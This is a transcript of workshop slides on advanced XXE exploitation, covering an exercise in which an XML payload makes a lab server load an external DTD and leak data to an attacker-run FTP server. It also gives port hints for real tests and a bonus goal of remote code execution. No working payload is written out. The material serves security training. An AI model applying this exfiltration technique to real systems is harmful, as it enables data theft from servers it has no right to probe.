advanced xxe exploitation exercise 2: external dtd …...burp suite professional vi .7.37 -...
TRANSCRIPT
Advanced XXE ExploitationExercise 2: External DTD (App port 8022)
Philippe ArteauGoSecure Countertack
19/06/2019Slides: http://bit.ly/xxeparis
Direct response from XXE
Not ideal In some case, you might have no response
Side-Channel XXE with external DTD
XML
Request DTD
Request FTP
XML payload
DTD host over HTTP
XML payload
FTP service
Edit FTP to have something unique
In real test, you should test using :- 443- 80- 21
1. Send XML payload
2. DTD is loaded!
3. FTP URL is evaluated!
Putting the pieces together
Using repeater efficiently with HackVertor
Using the fake FTP server interactivelly
Bonus:Try to get RCE on the server
QuestionS ?
[email protected]/blog/@h3xStream @GoSecure_Inc